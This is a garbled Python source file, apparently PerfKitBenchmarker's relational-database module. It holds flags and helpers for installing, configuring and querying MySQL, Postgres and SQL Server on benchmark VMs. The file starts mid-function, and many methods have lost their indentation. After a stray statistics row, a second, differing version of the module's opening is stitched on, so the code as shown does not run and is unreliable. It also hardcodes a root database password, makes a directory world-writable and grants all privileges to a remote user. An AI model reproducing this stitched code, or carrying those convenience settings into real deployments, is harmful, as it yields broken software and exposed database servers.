  # Use the cryptographically secure `secrets` module (not `random`) for
  # security-sensitive material.
  prefix = [
      secrets.choice(string.ascii_lowercase),
      secrets.choice(string.ascii_uppercase),
      secrets.choice(string.digits),
  ]
  return ''.join(prefix) + str(uuid.uuid4())[:10]
def GetRelationalDbClass(cloud):
  """Look up the provider-specific RelationalDb implementation.

  Args:
    cloud: name of the cloud whose implementation to fetch.

  Returns:
    The BaseRelationalDb subclass registered with CLOUD == `cloud`.
  """
  db_class = resource.GetResourceClass(BaseRelationalDb, CLOUD=cloud)
  return db_class
def VmsToBoot(vm_groups):
  """Filter `vm_groups` down to the groups PKB should boot.

  'clients' and 'default' groups always boot; the 'servers' group boots only
  when the database is unmanaged (hosted on a PKB-provisioned VM).

  Args:
    vm_groups: dict mapping group name to its spec.

  Returns:
    dict restricted to the groups that should be booted.
  """
  # TODO(jerlawson): Enable replications.
  # six.iteritems is unnecessary on Python 3; use dict.items() directly.
  return {
      name: spec
      for name, spec in vm_groups.items()
      if name in ('clients', 'default') or
      (not FLAGS.use_managed_db and name == 'servers')
  }
class BaseRelationalDb(resource.BaseResource):
"""Object representing a relational database Service."""
RESOURCE_TYPE = 'BaseRelationalDb'
  def __init__(self, relational_db_spec):
    """Initialize the managed relational database object.

    Args:
      relational_db_spec: spec of the managed database.

    Raises:
      UnsupportedError: if high availability is requested for an unmanaged db.
    """
    super(BaseRelationalDb, self).__init__()
    self.spec = relational_db_spec
    if not FLAGS.use_managed_db:
      # Unmanaged path: the database runs on a PKB-provisioned VM.
      if self.spec.high_availability:
        raise UnsupportedError('High availability is unsupported for unmanaged '
                               'databases.')
      self.endpoint = ''
      # Fixed credentials for the locally installed database server.
      self.spec.database_username = 'root'
      self.spec.database_password = 'perfkitbenchmarker'
      # Tunables sourced from command-line flags; the buffer-pool /
      # shared-buffer sizes may still be None here and are derived from the
      # server VM's memory in SetVms().
      self.innodb_buffer_pool_size = FLAGS.innodb_buffer_pool_size
      self.mysql_bin_log = FLAGS.mysql_bin_log
      self.innodb_log_file_size = FLAGS.innodb_log_file_size
      self.postgres_shared_buffer_size = FLAGS.postgres_shared_buffer_size
      self.is_managed_db = False
    else:
      self.is_managed_db = True
@property
def client_vm(self):
"""Client VM which will drive the database test.
This is required by subclasses to perform client-vm
network-specific tasks, such as getting information about
the VPC, IP address, etc.
Raises:
RelationalDbPropertyNotSet: if the client_vm is missing.
Returns:
The client_vm.
"""
if not hasattr(self, '_client_vm'):
raise RelationalDbPropertyNotSet('client_vm is not set')
return self._client_vm
@client_vm.setter
def client_vm(self, client_vm):
self._client_vm = client_vm
@property
def server_vm(self):
"""Server VM for hosting a managed database.
Raises:
RelationalDbPropertyNotSet: if the server_vm is missing.
Returns:
The server_vm.
"""
if not hasattr(self, '_server_vm'):
raise RelationalDbPropertyNotSet('server_vm is not set')
return self._server_vm
@server_vm.setter
def server_vm(self, server_vm):
self._server_vm = server_vm
  def SetVms(self, vm_groups):
    """Attach the client (and, for unmanaged DBs, server) VMs.

    When the database is unmanaged and buffer sizes were not set via flags,
    derives MySQL innodb buffer pool / Postgres shared buffer sizes as 25%
    of the server VM's memory.

    Args:
      vm_groups: dict mapping group name to the list of provisioned VMs.
    """
    self.client_vm = vm_groups['clients' if 'clients' in
                               vm_groups else 'default'][0]
    if not self.is_managed_db and 'servers' in vm_groups:
      self.server_vm = vm_groups['servers'][0]
      # total_memory_kb is in kB; convert to (decimal) GB.
      kb_to_gb = 1.0 / 1000000
      if not self.innodb_buffer_pool_size:
        self.innodb_buffer_pool_size = int(self.server_vm.total_memory_kb *
                                           kb_to_gb / 4)
      if not self.postgres_shared_buffer_size:
        self.postgres_shared_buffer_size = int(self.server_vm.total_memory_kb *
                                               kb_to_gb / 4)
# TODO(jerlawson): Enable replications.
  def MakePsqlConnectionString(self, database_name, use_localhost=False):
    """Build a quoted libpq key/value connection string for psql.

    Args:
      database_name: name of the database to connect to.
      use_localhost: if True, connect to 'localhost' instead of the
        instance endpoint.

    Returns:
      A quoted 'host=... user=... password=... dbname=...' string.
    """
    return '\'host={0} user={1} password={2} dbname={3}\''.format(
        self.endpoint if not use_localhost else 'localhost',
        self.spec.database_username, self.spec.database_password, database_name)
  def MakeMysqlConnectionString(self, use_localhost=False):
    """Build the mysql-client credential/host arguments.

    Port 3306 is passed explicitly only for unmanaged (VM-hosted) databases.

    Args:
      use_localhost: if True, connect to 'localhost' instead of the endpoint.

    Returns:
      A '-h ... -u ... -p...' argument string for the mysql client.
    """
    return '-h {0}{1} -u {2} -p{3}'.format(
        self.endpoint if not use_localhost else 'localhost',
        ' -P 3306' if not self.is_managed_db else '',
        self.spec.database_username, self.spec.database_password)
  def MakeSysbenchConnectionString(self):
    """Build sysbench --mysql-* connection arguments for this database.

    Port 3306 is passed explicitly only for unmanaged (VM-hosted) databases.

    Returns:
      A '--mysql-host=... --mysql-user=... --mysql-password="..."' string
      (with a trailing space).
    """
    return (
        '--mysql-host={0}{1} --mysql-user={2} --mysql-password="{3}" ').format(
            self.endpoint,
            ' --mysql-port=3306' if not self.is_managed_db else '',
            self.spec.database_username, self.spec.database_password)
  def MakeMysqlCommand(self, command, use_localhost=False):
    """Return Mysql Command with correct credentials.

    Args:
      command: SQL statement to execute via `mysql -e`.
      use_localhost: if True, target 'localhost' instead of the endpoint.

    Returns:
      A shell command string invoking the mysql client.
    """
    return 'mysql %s -e "%s"' % (self.MakeMysqlConnectionString(
        use_localhost=use_localhost), command)
  def MakeSqlserverCommand(self, command, use_localhost=False):
    """Return Sql server command with correct credentials.

    Args:
      command: T-SQL statement to execute via `sqlcmd -Q`.
      use_localhost: if True, target 'localhost' instead of the endpoint.

    Returns:
      A shell command string invoking sqlcmd.
    """
    return '/opt/mssql-tools/bin/sqlcmd -S %s -U %s -P %s -Q "%s"' % (
        self.endpoint if not use_localhost else 'localhost',
        self.spec.database_username, self.spec.database_password, command)
  def MakePostgresCommand(self, db_name, command, use_localhost=False):
    """Return Postgres command vm with correct credentials.

    Args:
      db_name: database to connect to.
      command: SQL statement to execute via `psql -c`.
      use_localhost: if True, connect to 'localhost' instead of the endpoint.

    Returns:
      A shell command string invoking psql.
    """
    return 'psql %s -c "%s"' % (self.MakePsqlConnectionString(
        db_name, use_localhost), command)
@property
def endpoint(self):
"""Endpoint of the database server (exclusing port)."""
if not hasattr(self, '_endpoint'):
raise RelationalDbPropertyNotSet('endpoint not set')
return self._endpoint
@endpoint.setter
def endpoint(self, endpoint):
self._endpoint = endpoint
@property
def port(self):
"""Port (int) on which the database server is listening."""
if not hasattr(self, '_port'):
raise RelationalDbPropertyNotSet('port not set')
return self._port
@port.setter
def port(self, port):
self._port = int(port)
  def GetResourceMetadata(self):
    """Returns a dictionary of benchmark-sample metadata.

    Child classes can extend this if needed.

    Raises:
      RelationalDbPropertyNotSet: if any expected metadata is missing.
    """
    # Fields that every relational-db sample carries unconditionally.
    metadata = {
        'zone': self.spec.db_spec.zone,
        'disk_type': self.spec.db_disk_spec.disk_type,
        'disk_size': self.spec.db_disk_spec.disk_size,
        'engine': self.spec.engine,
        'high_availability': self.spec.high_availability,
        'backup_enabled': self.spec.backup_enabled,
        'backup_start_time': self.spec.backup_start_time,
        'engine_version': self.spec.engine_version,
        'client_vm_zone': self.spec.vm_groups['clients'].vm_spec.zone,
        'use_managed_db': self.is_managed_db,
        'instance_id': self.instance_id,
        'client_vm_disk_type':
            self.spec.vm_groups['clients'].disk_spec.disk_type,
        'client_vm_disk_size':
            self.spec.vm_groups['clients'].disk_spec.disk_size,
    }
    # Server tuning knobs only apply to self-managed (unmanaged) databases.
    if not self.is_managed_db and self.spec.engine == 'mysql':
      metadata.update({
          'unmanaged_db_innodb_buffer_pool_size_gb':
              self.innodb_buffer_pool_size,
          'unmanaged_db_innodb_log_file_size_mb':
              self.innodb_log_file_size,
          'unmanaged_db_mysql_bin_log':
              self.mysql_bin_log
      })
    if not self.is_managed_db and self.spec.engine == 'postgres':
      metadata.update({
          'postgres_shared_buffer_size':
              self.postgres_shared_buffer_size
      })
    # The database size is described by exactly one of: machine_type,
    # (cpus, memory), or (tier, compute_units).
    if (hasattr(self.spec.db_spec, 'machine_type') and
        self.spec.db_spec.machine_type):
      metadata.update({
          'machine_type': self.spec.db_spec.machine_type,
      })
    elif hasattr(self.spec.db_spec, 'cpus') and (hasattr(
        self.spec.db_spec, 'memory')):
      metadata.update({
          'cpus': self.spec.db_spec.cpus,
      })
      metadata.update({
          'memory': self.spec.db_spec.memory,
      })
    elif hasattr(self.spec.db_spec, 'tier') and (hasattr(
        self.spec.db_spec, 'compute_units')):
      metadata.update({
          'tier': self.spec.db_spec.tier,
      })
      metadata.update({
          'compute_units': self.spec.db_spec.compute_units,
      })
    else:
      raise RelationalDbPropertyNotSet(
          'Machine type of the database must be set.')
    # Same idea for the client VM: machine_type or (cpus, memory).
    if (hasattr(self.spec.vm_groups['clients'].vm_spec, 'machine_type') and
        self.spec.vm_groups['clients'].vm_spec.machine_type):
      metadata.update({
          'client_vm_machine_type':
              self.spec.vm_groups['clients'].vm_spec.machine_type,
      })
    elif hasattr(self.spec.vm_groups['clients'].vm_spec, 'cpus') and (hasattr(
        self.spec.vm_groups['clients'].vm_spec, 'memory')):
      metadata.update({
          'client_vm_cpus': self.spec.vm_groups['clients'].vm_spec.cpus,
      })
      metadata.update({
          'client_vm_memory': self.spec.vm_groups['clients'].vm_spec.memory,
      })
    else:
      raise RelationalDbPropertyNotSet(
          'Machine type of the client VM must be set.')
    if FLAGS.db_flags:
      metadata.update({
          'db_flags': FLAGS.db_flags,
      })
    return metadata
  @abstractmethod
  def GetDefaultEngineVersion(self, engine):
    """Return the default version (for PKB) for the given database engine.

    Implemented by cloud-specific subclasses.

    Args:
      engine: Name of the database engine (e.g. 'mysql', 'postgres').

    Returns:
      Default version as a string for the given engine.
    """
  def _PostCreate(self):
    """Hook run after resource creation; applies any --db_flags."""
    self._ApplyDbFlags()
def _IsReadyUnmanaged(self):
"""Return true if the underlying resource is ready.
Returns:
True if MySQL was installed successfully, False if not.
Raises:
Exception: If this method is called when the database is a managed one.
Shouldn't happen.
"""
if self.is_managed_db:
raise Exception('Checking state of unmanaged database when the database '
'is managed.')
if self.spec.engine == 'mysql':
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysql56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7.')):
mysql_name = 'mysql57'
elif (self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0.')):
mysql_name = 'mysql80'
else:
raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service %s status' % self.server_vm.GetServiceName(mysql_name))
return stdout and not stderr
elif self.spec.engine == 'postgres':
stdout, stderr = self.server_vm.RemoteCommand(
'sudo service postgresql status')
return stdout and not stderr
raise UnsupportedError('%s engine is not supported '
'for unmanaged database.' % self.spec.engine)
def _InstallMySQLClient(self):
"""Installs MySQL Client on the client vm.
Raises:
Exception: If the requested engine version is unsupported.
"""
if (self.spec.engine_version == '5.6' or
self.spec.engine_version.startswith('5.6.')):
mysql_name = 'mysqlclient56'
elif (self.spec.engine_version == '5.7' or
self.spec.engine_version.startswith('5.7') or
self.spec.engine_version == '8.0' or
self.spec.engine_version.startswith('8.0')):
mysql_name = 'mysqlclient'
else:
raise Exception('Invalid database engine version: %s. Only 5.6, 5.7 '
'and 8.0 are supported.' % self.spec.engine_version)
self.client_vm.Install(mysql_name)
self.client_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.client_vm.GetPathToConfig(mysql_name))
self.client_vm.RemoteCommand(
'sudo cat %s' % self.client_vm.GetPathToConfig(mysql_name),
should_log=True)
  def _PrepareDataDirectories(self, mysql_name):
    """Moves the MySQL data and tmp directories onto the scratch disk.

    Copies /var/lib/mysql and /tmp to /scratch, updates AppArmor so mysqld
    may access the new paths, and rewrites datadir/tmpdir in the MySQL
    config.

    Args:
      mysql_name: PKB package name of the installed MySQL server (e.g.
        'mysql57'); used to locate its config file.
    """
    # Make the data directories in case they don't already exist.
    self.server_vm.RemoteCommand('sudo mkdir -p /scratch/mysql')
    self.server_vm.RemoteCommand('sudo mkdir -p /scratch/tmp')
    self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/mysql')
    self.server_vm.RemoteCommand('sudo chown mysql:mysql /scratch/tmp')
    # Copy all the contents of the default data directories to the new ones.
    self.server_vm.RemoteCommand(
        'sudo rsync -avzh /var/lib/mysql/ /scratch/mysql')
    self.server_vm.RemoteCommand('sudo rsync -avzh /tmp/ /scratch/tmp')
    self.server_vm.RemoteCommand('df', should_log=True)
    # Configure AppArmor: alias the old paths to the scratch locations and
    # whitelist the new directories for mysqld.
    self.server_vm.RemoteCommand(
        'echo "alias /var/lib/mysql -> /scratch/mysql," | sudo tee -a '
        '/etc/apparmor.d/tunables/alias')
    self.server_vm.RemoteCommand(
        'echo "alias /tmp -> /scratch/tmp," | sudo tee -a '
        '/etc/apparmor.d/tunables/alias')
    self.server_vm.RemoteCommand(
        'sudo sed -i '
        '"s|# Allow data files dir access|'
        ' /scratch/mysql/ r, /scratch/mysql/** rwk, /scratch/tmp/ r, '
        '/scratch/tmp/** rwk, /proc/*/status r, '
        '/sys/devices/system/node/ r, /sys/devices/system/node/node*/meminfo r,'
        ' /sys/devices/system/node/*/* r, /sys/devices/system/node/* r, '
        '# Allow data files dir access|g" /etc/apparmor.d/usr.sbin.mysqld')
    self.server_vm.RemoteCommand(
        'sudo apparmor_parser -r /etc/apparmor.d/usr.sbin.mysqld')
    self.server_vm.RemoteCommand('sudo systemctl restart apparmor')
    # Finally, change the MySQL data directory (the \t characters match
    # literal tabs in the stock config file).
    self.server_vm.RemoteCommand(
        'sudo sed -i '
        '"s|datadir\t\t= /var/lib/mysql|datadir\t\t= /scratch/mysql|g" '
        '%s' % self.server_vm.GetPathToConfig(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo sed -i '
        '"s|tmpdir\t\t= /tmp|tmpdir\t\t= /scratch/tmp|g" '
        '%s' % self.server_vm.GetPathToConfig(mysql_name))
def _SetupUnmanagedDatabase(self):
"""Installs unmanaged databases on server vm."""
db_engine = self.spec.engine
if self.client_vm.IS_REBOOTABLE:
self.client_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if self.server_vm.IS_REBOOTABLE:
self.server_vm.ApplySysctlPersistent({
'net.ipv4.tcp_keepalive_time': 100,
'net.ipv4.tcp_keepalive_intvl': 100,
'net.ipv4.tcp_keepalive_probes': 10
})
if db_engine == 'mysql':
self._InstallMySQLServer()
elif db_engine == 'postgres':
self._InstallPostgresServer()
else:
raise Exception(
'Engine {0} not supported for unmanaged databases.'.format(
self.spec.engine))
  def _InstallPostgresServer(self):
    """Installs and configures Postgres 13 on the server vm.

    Sets passwords/roles, moves the data directory to the scratch disk,
    enables remote connections, sizes shared_buffers, installs the bundled
    pg_hba.conf, and restarts the service.

    Raises:
      UnsupportedError: If the requested engine version is not 13.
    """
    if self.spec.engine_version == POSTGRES_13_VERSION:
      self.server_vm.Install('postgres13')
    else:
      raise UnsupportedError('Only postgres version 13 is currently supported')
    vm = self.server_vm
    version = self.spec.engine_version
    postgres_conf_path = POSTGRES_CONFIG_PATH.format(version)
    postgres_conf_file = postgres_conf_path + POSTGRES_CONFIG
    postgres_hba_conf_file = postgres_conf_path + POSTGRES_HBA_CONFIG
    # Ship the benchmark's pg_hba.conf to the server's home directory.
    vm.PushFile(data.ResourcePath(
        posixpath.join(POSTGRES_RESOURCE_PATH, POSTGRES_HBA_CONFIG)))
    vm.RemoteCommand('sudo -u postgres psql postgres -c '
                     '"ALTER USER postgres PASSWORD \'%s\';"'
                     % self.spec.database_password)
    vm.RemoteCommand('sudo -u postgres psql postgres -c '
                     '"CREATE ROLE %s LOGIN SUPERUSER PASSWORD \'%s\';"' %
                     (self.spec.database_username,
                      self.spec.database_password))
    # Point the data directory at the scratch disk.
    vm.RemoteCommand(
        'sudo sed -i.bak '
        '"s:\'/var/lib/postgresql/{0}/main\':\'{1}/postgresql/{0}/main\':" '
        '/etc/postgresql/{0}/main/postgresql.conf'.format(
            version, self.server_vm.GetScratchDir()))
    # Accept remote connections on all interfaces.
    vm.RemoteCommand(
        'sudo sed -i.bak '
        r'"s:\#listen_addresses ='
        ' \'localhost\':listen_addresses = \'*\':" '
        '{}'.format(postgres_conf_file))
    # Set the size of the shared buffer.
    vm.RemoteCommand(
        'sudo sed -i.bak "s:#shared_buffers = 128MB:shared_buffers = {}GB:" '
        '{}'.format(self.postgres_shared_buffer_size, postgres_conf_file))
    # Copy the existing data files over to the scratch disk.
    vm.RemoteCommand('sudo rsync -av /var/lib/postgresql /scratch')
    # Use cat to move files because mv would override file permissions.
    self.server_vm.RemoteCommand(
        "sudo bash -c "
        "'cat pg_hba.conf > "
        "{}'".format(postgres_hba_conf_file))
    # Dump the effective configs for logging, then restart.
    self.server_vm.RemoteCommand(
        'sudo cat {}'.format(postgres_conf_file))
    self.server_vm.RemoteCommand(
        'sudo cat {}'.format(postgres_hba_conf_file))
    vm.RemoteCommand('sudo systemctl restart postgresql')
  def _InstallMySQLServer(self):
    """Installs MySQL Server on the server vm.

    See
    https://d0.awsstatic.com/whitepapers/Database/optimizing-mysql-running-on-amazon-ec2-using-amazon-ebs.pdf
    for minimal tuning parameters.

    Raises:
      Exception: If the requested engine version is unsupported, or if this
        method is called when the database is a managed one. The latter
        shouldn't happen.
    """
    if (self.spec.engine_version == '5.6' or
        self.spec.engine_version.startswith('5.6.')):
      mysql_name = 'mysql56'
    elif (self.spec.engine_version == '5.7' or
          self.spec.engine_version.startswith('5.7.')):
      mysql_name = 'mysql57'
    elif (self.spec.engine_version == '8.0' or
          self.spec.engine_version.startswith('8.0.')):
      mysql_name = 'mysql80'
    else:
      raise Exception('Invalid database engine version: %s. Only 5.6 and 5.7 '
                      'and 8.0 are supported.' % self.spec.engine_version)
    self.server_vm.Install(mysql_name)
    self.server_vm.RemoteCommand('chmod 777 %s' %
                                 self.server_vm.GetScratchDir())
    # Stop the service before relocating its data directories.
    self.server_vm.RemoteCommand('sudo service %s stop' %
                                 self.server_vm.GetServiceName(mysql_name))
    self._PrepareDataDirectories(mysql_name)
    # Minimal MySQL tuning; see AWS whitepaper in docstring.
    innodb_buffer_pool_gb = self.innodb_buffer_pool_size
    innodb_log_file_mb = self.innodb_log_file_size
    self.server_vm.RemoteCommand(
        'echo "\n'
        f'innodb_buffer_pool_size = {innodb_buffer_pool_gb}G\n'
        'innodb_flush_method = O_DIRECT\n'
        'innodb_flush_neighbors = 0\n'
        f'innodb_log_file_size = {innodb_log_file_mb}M'
        '" | sudo tee -a %s' % self.server_vm.GetPathToConfig(mysql_name))
    # Optionally enable the binary log (controlled by --mysql_bin_log).
    if self.mysql_bin_log:
      self.server_vm.RemoteCommand('echo "\n'
                                   'server-id = 1\n'
                                   'log_bin = /var/log/mysql/mysql-bin.log\n'
                                   '" | sudo tee -a %s' %
                                   self.server_vm.GetPathToConfig(mysql_name))
    # These (and max_connections after restarting) help avoid losing connection.
    self.server_vm.RemoteCommand(
        'echo "\nskip-name-resolve\n'
        'connect_timeout = 86400\n'
        'wait_timeout = 86400\n'
        'interactive_timeout = 86400" | sudo tee -a %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    # Listen on all interfaces, and allow big client packets (the \t
    # characters match literal tabs in the stock config file).
    self.server_vm.RemoteCommand('sudo sed -i "s/bind-address/#bind-address/g" '
                                 '%s' %
                                 self.server_vm.GetPathToConfig(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo sed -i '
        '"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    # Configure logging (/var/log/mysql/error.log will print upon db deletion).
    self.server_vm.RemoteCommand(
        'echo "\nlog_error_verbosity = 3" | sudo tee -a %s' %
        self.server_vm.GetPathToConfig(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo cat /etc/mysql/mysql.conf.d/mysql.sock',
        should_log=True,
        ignore_failure=True)
    # Restart.
    self.server_vm.RemoteCommand('sudo service %s restart' %
                                 self.server_vm.GetServiceName(mysql_name))
    self.server_vm.RemoteCommand(
        'sudo cat %s' % self.server_vm.GetPathToConfig(mysql_name),
        should_log=True)
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'SET GLOBAL max_connections=8000;', use_localhost=True))
    # Grant the benchmark user access from the client VM's address.
    if FLAGS.ip_addresses == vm_util.IpAddressSubset.INTERNAL:
      client_ip = self.client_vm.internal_ip
    else:
      client_ip = self.client_vm.ip_address
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'CREATE USER \'%s\'@\'%s\' IDENTIFIED BY \'%s\';' %
            (self.spec.database_username, client_ip,
             self.spec.database_password),
            use_localhost=True))
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand(
            'GRANT ALL PRIVILEGES ON *.* TO \'%s\'@\'%s\';' %
            (self.spec.database_username, client_ip),
            use_localhost=True))
    self.server_vm.RemoteCommand(
        self.MakeMysqlCommand('FLUSH PRIVILEGES;', use_localhost=True))
def _ApplyDbFlags(self):
"""Apply Flags on the database."""
if FLAGS.db_flags:
if self.is_managed_db:
self._ApplyManagedDbFlags()
else:
if self.spec.engine == MYSQL:
self._ApplyMySqlFlags()
else:
raise NotImplementedError('Flags is not supported on %s' %
self.spec.engine)
def _ApplyManagedDbFlags(self):
"""Apply flags on the managed database."""
raise NotImplementedError('Managed Db flags is not supported for %s' %
type(self).__name__)
  def _ApplyMySqlFlags(self):
    """Applies each --db_flags entry to MySQL via a SET statement.

    Raises:
      Exception: If applying any flag produced output on stderr.
    """
    if FLAGS.db_flags:
      for flag in FLAGS.db_flags:
        cmd = self.MakeMysqlCommand('SET %s;' % flag)
        # NOTE(review): cmd is a single shell string, but vm_util.IssueCommand
        # conventionally takes an argv sequence — confirm this path actually
        # works, or whether it should run through a VM's RemoteCommand.
        _, stderr, _ = vm_util.IssueCommand(cmd, raise_on_failure=False)
        if stderr:
          raise Exception('Invalid MySQL flags: %s' % stderr)
def PrintUnmanagedDbStats(self):
"""Print server logs on unmanaged db."""
if self.spec.engine == 'mysql':
self.server_vm.RemoteCommand('sudo cat /var/log/mysql/error.log')
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_connects\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_clients\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
def Failover(self):
"""Fail over the database. Throws exception if not high available."""
if not self.spec.high_availability:
raise Exception('Attempt to fail over a database that isn\'t marked '
'as high available')
self._FailoverHA()
  @abstractmethod
  def _FailoverHA(self):
    """Fail over from master to replica.

    Implemented by cloud-specific subclasses.
    """
    pass
| 38.094872 | 117 | 0.658276 |
from abc import abstractmethod
import posixpath
import random
import re
import string
import uuid
from absl import flags
from perfkitbenchmarker import data
from perfkitbenchmarker import resource
from perfkitbenchmarker import vm_util
import six
flags.DEFINE_string('managed_db_engine', None,
'Managed database flavor to use (mysql, postgres)')
flags.DEFINE_string('managed_db_engine_version', None,
'Version of the database flavor selected, e.g. 5.7')
flags.DEFINE_string('managed_db_database_name', None,
'Name of the database to create. Defaults to '
'pkb-db-[run-uri]')
flags.DEFINE_string('managed_db_database_username', None,
'Database username. Defaults to '
'pkb-db-user-[run-uri]')
flags.DEFINE_string('managed_db_database_password', None,
'Database password. Defaults to '
'a random 10-character alpha-numeric string')
flags.DEFINE_boolean('managed_db_high_availability', False,
'Specifies if the database should be high availability')
flags.DEFINE_boolean('managed_db_backup_enabled', True,
'Whether or not to enable automated backups')
flags.DEFINE_string('managed_db_backup_start_time', '07:00',
'Time in UTC that automated backups (if enabled) '
'will be scheduled. In the form HH:MM UTC. '
'Defaults to 07:00 UTC')
flags.DEFINE_list('managed_db_zone', None,
'zone or region to launch the database in. '
'Defaults to the client vm\'s zone.')
flags.DEFINE_string('client_vm_zone', None,
'zone or region to launch the client in. ')
flags.DEFINE_string('managed_db_machine_type', None,
'Machine type of the database.')
flags.DEFINE_integer('managed_db_cpus', None,
'Number of Cpus in the database.')
flags.DEFINE_string('managed_db_memory', None,
'Amount of Memory in the database. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('managed_db_disk_size', None,
'Size of the database disk in GB.')
flags.DEFINE_string('managed_db_disk_type', None, 'Disk type of the database.')
flags.DEFINE_integer('managed_db_disk_iops', None,
'Disk iops of the database on AWS io1 disks.')
flags.DEFINE_integer('managed_db_azure_compute_units', None,
'Number of Dtus in the database.')
flags.DEFINE_string('managed_db_tier', None,
'Tier in azure. (Basic, Standard, Premium).')
flags.DEFINE_string('client_vm_machine_type', None,
'Machine type of the client vm.')
flags.DEFINE_integer('client_vm_cpus', None, 'Number of Cpus in the client vm.')
flags.DEFINE_string(
'client_vm_memory', None,
'Amount of Memory in the vm. Uses the same format '
'string as custom machine memory type.')
flags.DEFINE_integer('client_vm_disk_size', None,
'Size of the client vm disk in GB.')
flags.DEFINE_string('client_vm_disk_type', None, 'Disk type of the client vm.')
flags.DEFINE_integer('client_vm_disk_iops', None,
'Disk iops of the database on AWS for client vm.')
flags.DEFINE_boolean(
'use_managed_db', True, 'If true, uses the managed MySql '
'service for the requested cloud provider. If false, uses '
'MySql installed on a VM.')
flags.DEFINE_list(
'db_flags', '', 'Flags to apply to the implementation of '
'MySQL on the cloud that\'s being used. Example: '
'binlog_cache_size=4096,innodb_log_buffer_size=4294967295')
flags.DEFINE_integer(
'innodb_buffer_pool_size', None,
'Size of the innodb buffer pool size in GB. '
'Defaults to 25% of VM memory if unset')
flags.DEFINE_bool(
'mysql_bin_log', False,
'Flag to turn binary logging on. '
'Defaults to False')
flags.DEFINE_integer('innodb_log_file_size', 1000,
'Size of the log file in MB. Defaults to 1000M.')
flags.DEFINE_integer(
'postgres_shared_buffer_size', None,
'Size of the shared buffer size in GB. '
'Defaults to 25% of VM memory if unset')
BACKUP_TIME_REGULAR_EXPRESSION = '^\d\d\:\d\d$'
flags.register_validator(
'managed_db_backup_start_time',
lambda value: re.search(BACKUP_TIME_REGULAR_EXPRESSION, value) is not None,
message=('--database_backup_start_time must be in the form HH:MM'))
MYSQL = 'mysql'
POSTGRES = 'postgres'
AURORA_POSTGRES = 'aurora-postgresql'
AURORA_MYSQL = 'aurora-mysql'
AURORA_MYSQL56 = 'aurora'
SQLSERVER = 'sqlserver'
SQLSERVER_EXPRESS = 'sqlserver-ex'
SQLSERVER_ENTERPRISE = 'sqlserver-ee'
SQLSERVER_STANDARD = 'sqlserver-se'
ALL_ENGINES = [
MYSQL,
POSTGRES,
AURORA_POSTGRES,
AURORA_MYSQL,
AURORA_MYSQL56,
SQLSERVER,
SQLSERVER_EXPRESS,
SQLSERVER_ENTERPRISE,
SQLSERVER_STANDARD
]
FLAGS = flags.FLAGS
POSTGRES_13_VERSION = '13'
POSTGRES_RESOURCE_PATH = 'database_configurations/postgres'
POSTGRES_HBA_CONFIG = 'pg_hba.conf'
POSTGRES_CONFIG = 'postgresql.conf'
POSTGRES_CONFIG_PATH = '/etc/postgresql/{0}/main/'
class RelationalDbPropertyNotSet(Exception):
pass
class RelationalDbEngineNotFoundException(Exception):
pass
class UnsupportedError(Exception):
pass
def GenerateRandomDbPassword():
prefix = [random.choice(string.ascii_lowercase),
random.choice(string.ascii_uppercase),
random.choice(string.digits)]
return ''.join(prefix) + str(uuid.uuid4())[:10]
def GetRelationalDbClass(cloud):
return resource.GetResourceClass(BaseRelationalDb, CLOUD=cloud)
def VmsToBoot(vm_groups):
return {
name: spec
for name, spec in six.iteritems(vm_groups)
if name == 'clients' or name == 'default' or
(not FLAGS.use_managed_db and name == 'servers')
}
class BaseRelationalDb(resource.BaseResource):
RESOURCE_TYPE = 'BaseRelationalDb'
def __init__(self, relational_db_spec):
super(BaseRelationalDb, self).__init__()
self.spec = relational_db_spec
if not FLAGS.use_managed_db:
if self.spec.high_availability:
raise UnsupportedError('High availability is unsupported for unmanaged '
'databases.')
self.endpoint = ''
self.spec.database_username = 'root'
self.spec.database_password = 'perfkitbenchmarker'
self.innodb_buffer_pool_size = FLAGS.innodb_buffer_pool_size
self.mysql_bin_log = FLAGS.mysql_bin_log
self.innodb_log_file_size = FLAGS.innodb_log_file_size
self.postgres_shared_buffer_size = FLAGS.postgres_shared_buffer_size
self.is_managed_db = False
else:
self.is_managed_db = True
@property
def client_vm(self):
if not hasattr(self, '_client_vm'):
raise RelationalDbPropertyNotSet('client_vm is not set')
return self._client_vm
@client_vm.setter
def client_vm(self, client_vm):
self._client_vm = client_vm
@property
def server_vm(self):
if not hasattr(self, '_server_vm'):
raise RelationalDbPropertyNotSet('server_vm is not set')
return self._server_vm
@server_vm.setter
def server_vm(self, server_vm):
self._server_vm = server_vm
def SetVms(self, vm_groups):
self.client_vm = vm_groups['clients' if 'clients' in
vm_groups else 'default'][0]
if not self.is_managed_db and 'servers' in vm_groups:
self.server_vm = vm_groups['servers'][0]
kb_to_gb = 1.0 / 1000000
if not self.innodb_buffer_pool_size:
self.innodb_buffer_pool_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
if not self.postgres_shared_buffer_size:
self.postgres_shared_buffer_size = int(self.server_vm.total_memory_kb *
kb_to_gb / 4)
